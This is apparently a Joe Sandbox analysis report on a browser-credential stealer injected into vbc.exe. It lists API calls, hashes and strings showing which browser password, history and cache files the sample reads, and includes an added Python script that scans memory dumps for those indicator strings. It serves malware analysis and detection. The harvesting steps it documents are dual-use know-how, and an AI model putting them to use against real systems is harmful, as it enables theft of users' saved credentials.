  • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
  • Part of subcall function 00409FF2: memset.MSVCRT ref: 0040A015
  • Part of subcall function 00409FF2: memset.MSVCRT ref: 0040A02D
  • Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A049
  • Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A058
  • Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A09F
  • Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A0AE
  • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
• FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040A4B9
• wcschr.MSVCRT ref: 0040A4D0
• wcschr.MSVCRT ref: 0040A4F0
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040A515
• GetLastError.KERNEL32 ref: 0040A51F
• FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040A54B
• FindCloseUrlCache.WININET(?), ref: 0040A55C
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: CacheFindwcslen$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
• String ID: visited:
• API String ID: 615219573-1702587658
                                                                                                                                                                        • Opcode ID: 58ee3583334abb47630858a22ac836657d2b8b3eef5533a356816c3e949a7c62
                                                                                                                                                                        • Instruction ID: a8741c9f70935d188a110af9e9e8f96ccbc1ec5a4ffe9cc29b4dc234b75738c1
                                                                                                                                                                        • Opcode Fuzzy Hash: 58ee3583334abb47630858a22ac836657d2b8b3eef5533a356816c3e949a7c62
                                                                                                                                                                        • Instruction Fuzzy Hash: 5F419F72900219BBDB10EFA5DC85AAEBBB8FF44754F10406AE504F3281DB789E51CB99
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

Control-flow Graph
• Executed
• Not Executed
APIs
  • Part of subcall function 004060BC: _wcsicmp.MSVCRT ref: 004060ED
• memset.MSVCRT ref: 00409BC2
  • Part of subcall function 004063BB: memset.MSVCRT ref: 004064B7
• free.MSVCRT(000000FF,?,000000FF,00000000,00000104,73BCF560), ref: 00409C90
  • Part of subcall function 00409755: _wcsicmp.MSVCRT ref: 0040976E
  • Part of subcall function 00408FFD: wcslen.MSVCRT ref: 0040900C
  • Part of subcall function 00408FFD: _memicmp.MSVCRT ref: 0040903A
• _snwprintf.MSVCRT ref: 00409C5C
  • Part of subcall function 00408DC5: wcslen.MSVCRT ref: 00408DD7
  • Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408DFD
  • Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408E20
  • Part of subcall function 00408DC5: memcpy.MSVCRT ref: 00408E44
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
• String ID: $ContainerId$Container_%I64d$Containers$Name
• API String ID: 2804212203-2982631422
• Opcode ID: 016f43b69d351da20f18e3d08cfb22cc6f3daed84736ca8803c7e9159e0743c6
• Instruction ID: b0f72644bbd87b50ea7a8f8ee73cfa3b4c243fbe701b8101a2a2b04dab44341a
• Opcode Fuzzy Hash: 016f43b69d351da20f18e3d08cfb22cc6f3daed84736ca8803c7e9159e0743c6
• Instruction Fuzzy Hash: 29319471D042196AEF50EFA5CC45ADEB7F8AF44344F11007BA519B3182DB38AE448B98
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00408D9F: free.MSVCRT(?,00409176,00000000,?,00000000), ref: 00408DA2
  • Part of subcall function 00408D9F: free.MSVCRT(?,?,00409176,00000000,?,00000000), ref: 00408DAA
  • Part of subcall function 00408F1E: free.MSVCRT(00000000,004092A3,00000000,?,00000000), ref: 00408F25
  • Part of subcall function 0040A420: memset.MSVCRT ref: 0040A444
  • Part of subcall function 0040A420: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040A4B9
  • Part of subcall function 0040A420: wcschr.MSVCRT ref: 0040A4D0
  • Part of subcall function 0040A420: wcschr.MSVCRT ref: 0040A4F0
  • Part of subcall function 0040A420: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040A515
  • Part of subcall function 0040A420: GetLastError.KERNEL32 ref: 0040A51F
  • Part of subcall function 0040A56F: memset.MSVCRT ref: 0040A5DF
  • Part of subcall function 0040A56F: RegEnumValueW.ADVAPI32 ref: 0040A60D
  • Part of subcall function 0040A56F: _wcsupr.MSVCRT ref: 0040A627
  • Part of subcall function 0040A56F: memset.MSVCRT ref: 0040A676
  • Part of subcall function 0040A56F: RegEnumValueW.ADVAPI32 ref: 0040A6A1
  • Part of subcall function 00403C2A: LoadLibraryW.KERNEL32(advapi32.dll,?,0040A9C2,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,00411E75,?,?), ref: 00403C35
  • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00403C49
  • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00403C55
  • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00403C61
  • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403C6D
  • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403C79
  • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00403C85
• _wcslwr.MSVCRT ref: 0040AA14
• wcslen.MSVCRT ref: 0040AA29
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: AddressProc$freememset$CacheEntryEnumFindValuewcschr$ErrorFirstLastLibraryLoadNext_wcslwr_wcsuprwcslen
• String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
• API String ID: 4091582287-4196376884
• Opcode ID: a2e55a5f7a2abe8bdf86ac4545e9fd2e58219daa9b5178b84a3e4fad2c2eba33
• Instruction ID: e8c4dab73010a582bcb55339b064a6b15101daee4fa053d2547f161988c3f8ed
• Opcode Fuzzy Hash: a2e55a5f7a2abe8bdf86ac4545e9fd2e58219daa9b5178b84a3e4fad2c2eba33
• Instruction Fuzzy Hash: C731D272700204AADB20BB6ACD41A9F7669EF80344F25087FB844FB1C6DB78DD91D699
Uniqueness
• Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040A015
• memset.MSVCRT ref: 0040A02D
  • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
• wcslen.MSVCRT ref: 0040A049
• wcslen.MSVCRT ref: 0040A058
• wcslen.MSVCRT ref: 0040A09F
• wcslen.MSVCRT ref: 0040A0AE
  • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
  • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: wcslen$memset$FolderPathSpecialwcscatwcscpy
• String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
• API String ID: 2036768262-2114579845
• Opcode ID: 4f3e9085c2dbcc7e6162e8bbb838ae9c3514795d1e5f680df132b17e4eba2700
• Instruction ID: e8ec88334da27b7df1bd19bf5f92620076e348809ddf91dc3f5a530f518c7d73
• Opcode Fuzzy Hash: 4f3e9085c2dbcc7e6162e8bbb838ae9c3514795d1e5f680df132b17e4eba2700
• Instruction Fuzzy Hash: F121A9B254021C55DB20E691DC85EDB73BCAF54314F5104BFF615E2081EBB8DA84465D
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: memcpy
• String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
• API String ID: 3510742995-2641926074
• Opcode ID: 53a30cc7d252268d97bb4665958255b11a08b07c7cd133945acccca950d5993c
• Instruction ID: 2a909f6aa8b78d8aa74dd045bbec2887fe81728cdb5ed6237a850f532ee9234f
• Opcode Fuzzy Hash: 53a30cc7d252268d97bb4665958255b11a08b07c7cd133945acccca950d5993c
• Instruction Fuzzy Hash: 5A711CB1600201BFF310AF1ADC82B5AB798BB44719F15452FF45897782C7BDE9908B99
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00410C87: memset.MSVCRT ref: 00410CA3
  • Part of subcall function 00410C87: memset.MSVCRT ref: 00410CB8
  • Part of subcall function 00410C87: wcscat.MSVCRT ref: 00410CE1
  • Part of subcall function 00410C87: wcscat.MSVCRT ref: 00410D0A
• memset.MSVCRT ref: 00410A9A
• wcslen.MSVCRT ref: 00410AB1
• wcslen.MSVCRT ref: 00410AB9
• wcslen.MSVCRT ref: 00410B14
• wcslen.MSVCRT ref: 00410B22
  • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
  • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: wcslen$memsetwcscat$wcscpy
• String ID: history.dat$places.sqlite
• API String ID: 2541527827-467022611
• Opcode ID: 25ea34a281439d809f371ac1cf7c0884433c21bdeb59f3c4b6e0df9e4197b33a
• Instruction ID: 16c00ee82f17989474e920b03892a6de4e18c3fe0141c7e4295d5dc86641310b
• Opcode Fuzzy Hash: 25ea34a281439d809f371ac1cf7c0884433c21bdeb59f3c4b6e0df9e4197b33a
• Instruction Fuzzy Hash: 17314571D041189ADF10EBA5DC89ACDB3B8AF50319F20457FE554F2182EB7C9A84CB58
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: wcslen$memsetwcscatwcscpy
• String ID: Login Data$Web Data
• API String ID: 3932597654-4228647177
• Opcode ID: 7231a64d0824cf94e0c730f6189b32a897f20d3e441a0ecaf3f9be98e6314f32
• Instruction ID: 9a91d2e82c236d30763d7b9ebcc1a6cccb69c4478b10b945406aecd22e6d63c1
• Opcode Fuzzy Hash: 7231a64d0824cf94e0c730f6189b32a897f20d3e441a0ecaf3f9be98e6314f32
• Instruction Fuzzy Hash: 46218B7250411C6ADB10EB55EC89FDA73ACAF50328F14487FF518E3191EBBCDAC44658
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNELBASE(?,-7FBE8982,00000003,00000000,?,?,00000000), ref: 00417D72
• CreateFileA.KERNEL32(?,-7FBE8982,00000003,00000000,004175FE,004175FE,00000000), ref: 00417D8A
• GetLastError.KERNEL32 ref: 00417D99
• free.MSVCRT(?), ref: 00417DA6
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: CreateFile$ErrorLastfree
• String ID:
• API String ID: 77810686-0
• Opcode ID: a26124fb8da27f2cbfd9df83ebe6b72667bba8263af52734d4187cb9e803d476
• Instruction ID: 35fec4397722218e6507e77f53b50855b574b2e4c8baf302a97b237cc2aa3bd3
• Opcode Fuzzy Hash: a26124fb8da27f2cbfd9df83ebe6b72667bba8263af52734d4187cb9e803d476
• Instruction Fuzzy Hash: D841F27150C3059FEB20CF25EC4179BBBF4EF84314F10892EF89592291D738DA848B96
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ??2@$DeleteHandleIconLoadModuleObjectmemset
• String ID:
• API String ID: 3532479477-0
• Opcode ID: 14c3c2aa7062e08bf63dc7d5d281a39e77aead53937f861c87ecd8ed2eee7028
• Instruction ID: 6b7a5e441d588d9bc54ea64e01ff161f986e35cd5d296fb942180f783725d529
• Opcode Fuzzy Hash: 14c3c2aa7062e08bf63dc7d5d281a39e77aead53937f861c87ecd8ed2eee7028
• Instruction Fuzzy Hash: EA315EB19013888FDB30EF668C896CAB6E9BF45314F00863FE84DDB641DBB946448B59
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00410CA3
• memset.MSVCRT ref: 00410CB8
  • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
  • Part of subcall function 00407DD1: wcslen.MSVCRT ref: 00407DD2
  • Part of subcall function 00407DD1: wcscat.MSVCRT ref: 00407DEA
• wcscat.MSVCRT ref: 00410CE1
  • Part of subcall function 00414558: memset.MSVCRT ref: 004145B1
  • Part of subcall function 00414558: RegCloseKey.ADVAPI32(?), ref: 00414618
  • Part of subcall function 00414558: wcscpy.MSVCRT ref: 00414626
• wcscat.MSVCRT ref: 00410D0A
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
• String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
• API String ID: 1534475566-1174173950
• Opcode ID: 86b2fee5573bc67bc9087b08d08cdc2ad0ccfef1d6009a232684216d2b924b41
• Instruction ID: 1b820a25e8b0a88a2df896ef0368420f7b9c24777a221978b2b2a3cd549cec0e
• Opcode Fuzzy Hash: 86b2fee5573bc67bc9087b08d08cdc2ad0ccfef1d6009a232684216d2b924b41
• Instruction Fuzzy Hash: 860152B294031C76EB20AB668C86EDB762C9F85358F0141AAB618B7142D97C9DC44AAD
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040B1BF: free.MSVCRT(00000000,00410160,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040B1C6
  • Part of subcall function 00411E4C: memset.MSVCRT ref: 00411EC2
  • Part of subcall function 00411E4C: wcsrchr.MSVCRT ref: 00411EDB
  • Part of subcall function 00411BB2: SetCurrentDirectoryW.KERNEL32(?,?,?,00403557,?), ref: 00411BFF
• memset.MSVCRT ref: 004035BC
• memcpy.MSVCRT ref: 004035D0
• wcscmp.MSVCRT ref: 004035F8
• _wcsicmp.MSVCRT ref: 0040362F
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$CurrentDirectory_wcsicmpfreememcpywcscmpwcsrchr
• String ID:
• API String ID: 1763786148-3916222277
• Opcode ID: 09aee775218a621ff1fef0c9153cb1cfdc5fccf2e7c31d726b2849875dfa8a1e
• Instruction ID: bd143a35ad5b1b32f57d6bfe9876d60f7f1e4d0a05a181755c1d953110edcb1c
• Opcode Fuzzy Hash: 09aee775218a621ff1fef0c9153cb1cfdc5fccf2e7c31d726b2849875dfa8a1e
• Instruction Fuzzy Hash: 24412A71D40229AADF20EFA5CC45ADEB7B8AF44318F1044ABE508B3241DB789B858F59
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004144AB: LoadLibraryW.KERNEL32(shell32.dll,0040FF7C,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 004144B9
  • Part of subcall function 004144AB: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004144CE
• SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
• memset.MSVCRT ref: 004145B1
• RegCloseKey.ADVAPI32(?), ref: 00414618
• wcscpy.MSVCRT ref: 00414626
  • Part of subcall function 004083A1: GetVersionExW.KERNEL32(00452E28,0000001A,00414579), ref: 004083BB
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 004145CC, 004145DC
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersionmemsetwcscpy
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• API String ID: 2699640517-2036018995
• Opcode ID: 1f48f7e9f744942bfd9fbef0cf09dbb4d3108d1291aa30ec74452a86fee1161f
• Instruction ID: e12ff53167afe07261100608862af2d586d512a8c684a17975878dc8bda8b34c
• Opcode Fuzzy Hash: 1f48f7e9f744942bfd9fbef0cf09dbb4d3108d1291aa30ec74452a86fee1161f
• Instruction Fuzzy Hash: 42112B71800214BBEF20A759CC4EAEFB3BDDB85754F6100A7F914A2151E62C5FC5869E
Uniqueness
Uniqueness Score: -1.00%
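
The function blocks above (history.dat / places.sqlite, Login Data / Web Data, Mozilla\Firefox\Profiles, and the Shell Folders registry fallback used by the function at 00414558 after SHGetSpecialFolderPathW with CSIDL 0x1A, which is CSIDL_APPDATA) together describe the browser-artifact path builder of the password-recovery code running in the injected vbc.exe image at 0x400000. The script below is an added triage example, not part of the Joe Sandbox report and not code from the sample: it scans a raw memory dump for exactly those String IDs, as the UTF-16LE literals the wcslen/wcscat calls imply (plus ANSI copies for the CreateFileA path), and maps each hit to a virtual address using the 0x400000 image base from the Memory Dump Source line. The dump bytes it runs on are constructed inline for illustration; to use it on the real snapshot, pass the file's bytes to scan_dump instead.

```python
"""Triage helper: locate browser-credential artifact strings in a process memory dump.

Added example. The ARTIFACTS table is built from the String IDs listed in the
function blocks of this report; the sample dump is constructed here, not taken
from hcaresult_8_2_400000_vbc.jbxd.
"""
import re
from collections import defaultdict

# Indicator strings grouped by what they point at (taken from the report's String IDs).
ARTIFACTS = {
    "Firefox history": ["history.dat", "places.sqlite"],
    "Chromium credentials": ["Login Data", "Web Data"],
    "Firefox profile path": ["Mozilla\\Firefox\\Profiles", "Mozilla\\Profiles"],
    "Shell Folders registry fallback": [
        "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders",
    ],
}


def _encodings(s):
    # The path builder uses wcslen/wcscat, so the literals are UTF-16LE in the image.
    # An ANSI copy is checked too because the sample also has a CreateFileA path.
    return {"utf-16le": s.encode("utf-16-le"), "ascii": s.encode("ascii")}


def scan_dump(blob, base=0x400000):
    """Return {category: [(va, encoding, string), ...]} for every artifact found.

    `base` is the image base of the dump (0x400000 per the Memory Dump Source line),
    so reported addresses line up with the `ref:` addresses in the report.
    """
    hits = defaultdict(list)
    for category, strings in ARTIFACTS.items():
        for s in strings:
            for enc, needle in _encodings(s).items():
                for m in re.finditer(re.escape(needle), blob):
                    hits[category].append((base + m.start(), enc, s))
    for category in hits:
        hits[category].sort()
    return dict(hits)


def summarize(hits):
    """One triage line per category, sorted by category name."""
    return [
        f"{cat}: {len(v)} hit(s), first at 0x{v[0][0]:08x} ({v[0][1]})"
        for cat, v in sorted(hits.items())
    ]


def build_sample_dump():
    """Constructed stand-in for a memory dump: zero padding with a few UTF-16LE
    literals placed at fixed offsets. Illustrative only, not data from the sample."""
    buf = bytearray(0x1000)

    def put(offset, s):
        data = s.encode("utf-16-le") + b"\x00\x00"  # NUL-terminated wide string
        buf[offset:offset + len(data)] = data

    put(0x0100, "places.sqlite")
    put(0x0200, "Login Data")
    put(0x0300, "Mozilla\\Firefox\\Profiles")
    put(0x0400, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders")
    return bytes(buf)


if __name__ == "__main__":
    for line in summarize(scan_dump(build_sample_dump())):
        print(line)
```

Hits on several categories in one image corroborate the "Tries to harvest and steal browser information" signature with addresses you can cross-check against the `ref:` values above; a hit only on the Shell Folders key is weaker on its own, since legitimate software resolves that key too.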

APIs
• wcschr.MSVCRT ref: 00413D15
• _snwprintf.MSVCRT ref: 00413D3A
• WritePrivateProfileStringW.KERNEL32(?,?,?,0044BCA0), ref: 00413D58
• GetPrivateProfileStringW.KERNEL32 ref: 00413D70
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: PrivateProfileString$Write_snwprintfwcschr
• String ID: "%s"
• API String ID: 1343145685-3297466227
• Opcode ID: 02edbd4849e356a2dd53856aa56349abaee77aee134cad8029ffbeba199e4c17
• Instruction ID: 73e04fdb7293ad0563e201354ce1ff8293903967f03a71563bfd8de655adbfaf
• Opcode Fuzzy Hash: 02edbd4849e356a2dd53856aa56349abaee77aee134cad8029ffbeba199e4c17
                                                                                                                                                                        • Instruction Fuzzy Hash: 2401AD3240521EBBEF229F91EC45FDB3B6AFF04745F14806ABA1854062D779C660DB98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041357A,00000000,?,?,?,?,00000000,?), ref: 0041338D
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 004133A7
                                                                                                                                                                        • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,0041357A,00000000,?,?,?,?,00000000,?), ref: 004133CA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                        • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                        • API String ID: 1714573020-3385500049
                                                                                                                                                                        • Opcode ID: 309a91ae3d39bfd2be00db52258639a55574cbf10b15d42bee79424e3042c4b9
                                                                                                                                                                        • Instruction ID: da68f8d270a38a3c71bb0a1d73356e5427966c5ec0fa45e2ea30989c2ad8b33c
                                                                                                                                                                        • Opcode Fuzzy Hash: 309a91ae3d39bfd2be00db52258639a55574cbf10b15d42bee79424e3042c4b9
                                                                                                                                                                        • Instruction Fuzzy Hash: 41F01535140208AFEF108F91EC44B9A7BA9AB08B86F404026FE18C1162CB75DAA0DB5C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcmp
                                                                                                                                                                        • String ID: @ $SQLite format 3
                                                                                                                                                                        • API String ID: 1475443563-3708268960
                                                                                                                                                                        • Opcode ID: e922d6e76d25ca0bc981f6f0caf64cc85a23792da3e792978c200f14c15407ff
                                                                                                                                                                        • Instruction ID: 378f5b88a64b421c164fea27eec5394a6c1f6cf5fd0cfe57e22cb817cc3972c5
                                                                                                                                                                        • Opcode Fuzzy Hash: e922d6e76d25ca0bc981f6f0caf64cc85a23792da3e792978c200f14c15407ff
                                                                                                                                                                        • Instruction Fuzzy Hash: 4E51C1B59002059BDF14DF6AC8817DAB7F4AF54314F15019BEC04EB34AE778EA85CB98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00409A23: OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409A98
                                                                                                                                                                          • Part of subcall function 00409A23: GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00409AB7
                                                                                                                                                                          • Part of subcall function 00409A23: DuplicateHandle.KERNELBASE(00000000,00000104,00000000), ref: 00409AC4
                                                                                                                                                                          • Part of subcall function 00409A23: GetFileSize.KERNEL32(00000000,00000000), ref: 00409AD9
                                                                                                                                                                          • Part of subcall function 00409A23: CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00409B03
                                                                                                                                                                          • Part of subcall function 00409A23: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 00409B18
                                                                                                                                                                          • Part of subcall function 00409A23: WriteFile.KERNELBASE(?,00000000,00000104,0040A0FE,00000000), ref: 00409B33
                                                                                                                                                                          • Part of subcall function 00409A23: UnmapViewOfFile.KERNEL32(00000000), ref: 00409B3A
                                                                                                                                                                          • Part of subcall function 00409A23: FindCloseChangeNotification.KERNELBASE(?), ref: 00409B43
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040A0FE,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409F87
                                                                                                                                                                          • Part of subcall function 00409CB0: memset.MSVCRT ref: 00409D85
                                                                                                                                                                          • Part of subcall function 00409CB0: wcschr.MSVCRT ref: 00409DBD
                                                                                                                                                                          • Part of subcall function 00409CB0: memcpy.MSVCRT ref: 00409DF1
                                                                                                                                                                        • DeleteFileW.KERNELBASE(?,?,0040A0FE,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409FA8
                                                                                                                                                                        • CloseHandle.KERNEL32(000000FF,?,0040A0FE,000000FF,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409FCF
                                                                                                                                                                          • Part of subcall function 00409B7A: memset.MSVCRT ref: 00409BC2
                                                                                                                                                                          • Part of subcall function 00409B7A: _snwprintf.MSVCRT ref: 00409C5C
                                                                                                                                                                          • Part of subcall function 00409B7A: free.MSVCRT(000000FF,?,000000FF,00000000,00000104,73BCF560), ref: 00409C90
                                                                                                                                                                        Strings
                                                                                                                                                                        • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 00409EC7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                        • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat
                                                                                                                                                                        • API String ID: 3931293568-1514811420
                                                                                                                                                                        • Opcode ID: eeb481b1dff4e993c2893e9f0026ff803c1a702ff2030c6be45b7232c18bb5a2
                                                                                                                                                                        • Instruction ID: 3f51e9d3f4722dee63ca69fa5b044a2e48b650b6030bfe0f748ec1b1a5da80f7
                                                                                                                                                                        • Opcode Fuzzy Hash: eeb481b1dff4e993c2893e9f0026ff803c1a702ff2030c6be45b7232c18bb5a2
                                                                                                                                                                        • Instruction Fuzzy Hash: 65311CB1C006589BCF60DFA5CD855CDF7B8AF40314F1002AB9519F31A2DB755E858F58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmpqsort
                                                                                                                                                                        • String ID: /nosort$/sort
